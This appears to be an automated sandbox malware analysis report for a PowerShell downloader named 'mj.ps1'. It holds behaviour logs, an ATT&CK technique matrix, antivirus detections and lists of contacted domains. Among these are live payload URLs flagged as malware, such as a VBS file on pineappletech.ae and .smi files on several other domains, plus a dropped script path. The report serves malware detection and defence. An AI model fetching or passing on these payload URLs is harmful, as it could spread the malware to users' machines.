          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts12
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569000 Sample: mj.ps1 Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 30 www.fornid.com 2->30 32 fornid.com 2->32 34 5 other IPs or domains 2->34 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 9 powershell.exe 16 23 2->9         started        signatures3 process4 dnsIp5 40 fornid.com 93.95.216.175, 443, 49728 SERVERPLAN-ASIT Italy 9->40 42 www.pineappletech.ae 91.193.42.13, 443, 49734 ITFPL Belgium 9->42 28 C:\Users\Public\p2q.vbs, ASCII 9->28 dropped 52 Powershell creates an autostart link 9->52 14 wscript.exe 1 9->14         started        17 powershell.exe 22 9->17         started        19 conhost.exe 9->19         started        file6 signatures7 process8 signatures9 54 Suspicious powershell command line found 14->54 56 Wscript starts Powershell (via cmd or directly) 14->56 58 Obfuscated command line found 14->58 62 2 other signatures 14->62 21 powershell.exe 36 14->21         started        60 Loading BitLocker PowerShell Module 17->60 process10 dnsIp11 36 erp-royal-crown.info 148.251.114.233, 443, 49777, 49806 HETZNER-ASDE Germany 21->36 38 almrwad.com 184.171.244.231, 443, 49748, 49765 DIMENOCUS United States 21->38 24 conhost.exe 21->24         started        26 cmd.exe 1 21->26         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mj.ps132%ReversingLabsScript-PowerShell.Trojan.PShell
          mj.ps1100%AviraTR/PShell.Dldr.VPA

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.almrwad.com/wh/Subordiner0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List0%Avira URL Cloudsafe
          https://www.fornid.com/ordine0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerende100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Su0%Avira URL Cloudsafe
          https://www.almrwad.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordine0%Avira URL Cloudsafe
          https://www.almrwad.com/w0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordineren100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerend100%Avira URL Cloudphishing
          https://www.almrwad.c0%Avira URL Cloudsafe
          http://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.fornid.com/90-maschere-per-saldatura0%Avira URL Cloudsafe
          http://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordine100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.fornid.com/133-occhiali-protettivi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.i0%Avira URL Cloudsafe
          https://www.pineappletech.ae/na/mg.vbs100%Avira URL Cloudmalware
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordin0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordinerendes70%Avira URL Cloudsafe
          https://www.fornid.com/contattaci0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes0%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subord0%Avira URL Cloudsafe
          https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/0%Avira URL Cloudsafe
          https://www.almrwad.com0%Avira URL Cloudsafe
          https://www.fornid.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerende0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.sm0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf100%Avira URL Cloudmalware
          https://www.almrwad.com/wh/Subordinerendes78.s0%Avira URL Cloudsafe
          https://www.fornid.com/144-filtri-per-maschere0%Avira URL Cloudsafe
          http://www.fornid.com/0%Avira URL Cloudsafe
          http://almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes780%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subord100%Avira URL Cloudphishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp30%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/w100%Avira URL Cloudphishing
          https://www.erp-royal-crown.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          http://fornid.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.erp-royal-crown.info/wh/Subordinere100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh100%Avira URL Cloudphishing
          https://www.fornid.com/sitemap0%Avira URL Cloudsafe
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro0%Avira URL Cloudsafe
          https://www.fornid.com/145-maschere-antigas0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerend0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordi100%Avira URL Cloudphishing
          https://www.fornid.com/il-mio-account0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subor100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subo100%Avira URL Cloudphishing
          http://www.almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinere0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.in0%Avira URL Cloudsafe
          https://www.almrwad.co0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.0%Avira URL Cloudsafe
          http://erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes100%Avira URL Cloudphishing
          https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf0%Avira URL Cloudsafe
          https://www.fornid.com/img/logo.jpg0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.s100%Avira URL Cloudphishing
          https://www.almrwad.com/wh0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sub0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordin100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subo0%Avira URL Cloudsafe
          http://blog.fornid.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78100%Avira URL Cloudphishing
          https://www.almrwad.0%Avira URL Cloudsafe
          http://www.fornid.com/content/13-international-shipments0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subor0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes7100%Avira URL Cloudphishing
          http://www.fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/cerca0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordineren0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/100%Avira URL Cloudphishing
          https://www.erp-royal-crown.inf0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sub100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          erp-royal-crown.info
          		148.251.114.233
          		truefalse
            		unknown
            almrwad.com
            		184.171.244.231
            		truefalse
              		unknown
              fornid.com
              		93.95.216.175
              		truetrue
                		unknown
                www.pineappletech.ae
                		91.193.42.13
                		truefalse
                  		unknown
                  www.fornid.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.almrwad.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.erp-royal-crown.info
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.pineappletech.ae/na/mg.vbstrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdffalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.erp-royal-crown.info/wh/Subordinerendes78.smitrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.almrwad.com/wh/Subordinerendes78.smifalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinerpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/Listpowershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000001.00000002.1582421341.000002CDC2B50000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.almrwad.com/wh/Supowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerenpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.com/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.cpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.erp-royal-crown.info/wh/Subordinepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.pineappletech.aepowershell.exe, 00000001.00000002.1514726032.000002CDAC968000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.ipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.almrwad.com/wh/Subordinpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.erp-royal-crown.info/wh/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://www.almrwad.com/wh/Subordinerendes7powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.almrwad.com/wh/Subordpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.fornid.com/contattacipowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.almrwad.com/wh/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.almrwad.com/wh/Subordinerendespowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000001.00000002.1514726032.000002CDAB622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbspowershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.fornid.compowershell.exe, 00000001.00000002.1514726032.000002CDAC4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendes78.spowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.almrwad.com/wh/Subordinerendes78.smpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fornid.com/powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
